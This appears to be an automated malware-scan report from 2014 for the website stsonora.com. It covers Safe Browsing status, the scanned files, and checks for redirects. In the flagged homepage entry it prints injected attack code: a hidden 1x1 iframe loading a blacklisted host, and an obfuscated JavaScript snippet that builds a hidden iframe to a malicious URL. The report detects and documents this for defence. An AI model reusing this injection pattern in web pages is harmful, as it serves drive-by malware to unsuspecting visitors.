Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stsonora.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.stsonora.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Sun, 22 Jun 2014 05:15:31 GMT Pragma: no-cache Location: http://stsonora.com/ Server: Microsoft-IIS/8.5 Content-Length: 146 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=l6o8dt7cemv63ck4279g4mt5m5; path=/ Set-Cookie: wfvt_350183620=53a666745b48d; expires=Sun, 22-Jun-2014 05:45:32 GMT; path=/; httponly X-Pingback: http://stsonora.com/xmlrpc.php X-Powered-By: PHP/5.3.26 X-Powered-By: ASP.NET | clean |
http://stsonora.com/ | 200 OK Content-Length: 29535 Content-Type: text/html | malicious |
Page code contains blacklisted domain: gamedev.raconsultants.net ...[32490 bytes skipped]... .resize(function() { $('#main_menu > ul') .supersubs({ minWidth: 12, // minimum width of sub-menus in em units maxWidth: 27, // maximum width of sub-menus in em units extraWidth: 1 // extra width can ensure lines don't sometimes turn over }); }); })(jQuery); </script><iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"></iframe>vw='abi';s='rg';vo='ifr';h='lli';ov='a';p='i';a='r';d='s';e='k';m='c';o='p:/';b='?';zj='b';bi='a.o';hb='me';pa='ng.';c='/';ee='/';mo='z';g='htt';lg='y';w='i';y='fra';x=w.concat(y,hb);te=d.concat(a,m);t=g.concat(o,c,zj,p,h,pa,mo,vw,lg,ov,e,bi,s,ee,b,vo);var bf=document.createElement(x);bf.setAttribute('width','5');bf.setAttribute('height','5');bf.setAttribute('style','display:none');bf.setAttribute(te,t);document.body.appendChild(b ...[412 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://gamedev.raconsultants.net/ok.php This URL is marked by Google as suspicious <iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"> Malicious iFrame found. size: 0x0 src: http://zabiyaka.org/file/ok.php This URL is marked by Google as suspicious <iframe src="http://zabiyaka.org/file/ok.php" width="0" height="0"> | ||
http://stsonora.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js?ver=2.6.2 | 200 OK Content-Length: 15414 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/CuteSlider/js/cute.slider.js?ver=1.1.1 | 200 OK Content-Length: 42563 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/CuteSlider/js/cute.transitions.all.js?ver=1.1.1 | 200 OK Content-Length: 16781 Content-Type: application/javascript | clean |
http://cdnjs.cloudflare.com/ajax/libs/respond.js/1.1.0/respond.min.js?ver=1.1.0 | 200 OK Content-Length: 4069 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/google-calendar-events/js/jquery-qtip.js | 200 OK Content-Length: 38428 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/google-calendar-events/js/gce-script.js | 200 OK Content-Length: 1616 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?ver=3.9.1 | 200 OK Content-Length: 17128 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=3.9.1 | 200 OK Content-Length: 55455 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 6521 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js?ver=1.10.4 | 200 OK Content-Length: 11623 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.4 | 200 OK Content-Length: 35806 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stsonora.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Sun, 22 Jun 2014 05:15:33 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.5
Content-Length: 29535
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://stsonora.com/>; rel=shortlink
Set-Cookie: PHPSESSID=ls3k2hltv0koqdepqbce10alj6; path=/
Set-Cookie: wfvt_350183620=53a6667575b1d; expires=Sun, 22-Jun-2014 05:45:33 GMT; path=/; httponly
X-Pingback: http://stsonora.com/xmlrpc.php
X-Powered-By: PHP/5.3.26
X-Powered-By: ASP.NET
...29535 bytes of data.
GET / HTTP/1.1
Host: stsonora.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Sun, 22 Jun 2014 05:15:33 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.5
Content-Length: 29535
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://stsonora.com/>; rel=shortlink
Set-Cookie: PHPSESSID=ls3k2hltv0koqdepqbce10alj6; path=/
Set-Cookie: wfvt_350183620=53a6667575b1d; expires=Sun, 22-Jun-2014 05:45:33 GMT; path=/; httponly
X-Pingback: http://stsonora.com/xmlrpc.php
X-Powered-By: PHP/5.3.26
X-Powered-By: ASP.NET
...29535 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stsonora.com
Referer: http://www.google.com/search?q=stsonora.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stsonora.com
Referer: http://www.google.com/search?q=stsonora.com
Result:
The result is similar to the first query. There are no suspicious redirects found.